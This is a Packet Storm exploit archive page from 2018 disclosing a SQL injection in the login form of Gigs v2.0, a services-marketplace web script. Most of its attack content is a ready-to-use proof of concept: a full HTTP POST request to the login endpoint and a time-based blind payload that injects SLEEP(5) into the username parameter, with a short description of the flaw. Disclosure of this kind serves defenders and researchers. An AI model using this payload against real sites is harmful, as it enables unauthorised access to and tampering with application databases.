Twenty Year Anniversary

Gigs 2.0 SQL Injection

Gigs 2.0 SQL Injection
Posted May 24, 2018
Authored by Ozkan Mustafa Akkus

Gigs version 2.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 6fc506d7f13098295e0e483c205adac6

Gigs 2.0 SQL Injection

Change Mirror Download
# Exploit Title: Gigs v2.0 - Login Page SQL Injection
# Dork: N/A
# Date: 23.05.2018
# Exploit Author: Azkan Mustafa AkkuA (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/gigs-services-marketplace/20716059
# Version: v2.0
# Category: Webapps
# Tested on: Kali linux
# Description : PHP Dashboards is prone to an SQL-injection vulnerability
because it fails to sufficiently sanitize user-supplied data before using
it in an SQL query.Exploiting this issue could allow an attacker to
compromise the application, access or modify data, or exploit latent
vulnerabilities in the underlying database.
====================================================

# PoC : SQLi :

https://test.com/thegigs/user/dashboard/is_valid_login

POST /thegigs/user/dashboard/is_valid_login HTTP/1.1
Host: dreamguys.co.in
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101
Firefox/45.0
Accept: text/javascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://test.com/thegigs/
Content-Length: 27
Cookie: ci_session=33p2j7q2a35qt5vrjt1r0985pt2i0v7g
Connection: keep-alive
username=demo&password=1234

Vulnerable Payload :

Parameter: username (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: username=demo' AND SLEEP(5) AND 'NVll'='NVll&password=1234


====================================================

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

December 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    11 Files
  • 2
    Dec 2nd
    1 Files
  • 3
    Dec 3rd
    18 Files
  • 4
    Dec 4th
    40 Files
  • 5
    Dec 5th
    16 Files
  • 6
    Dec 6th
    50 Files
  • 7
    Dec 7th
    10 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close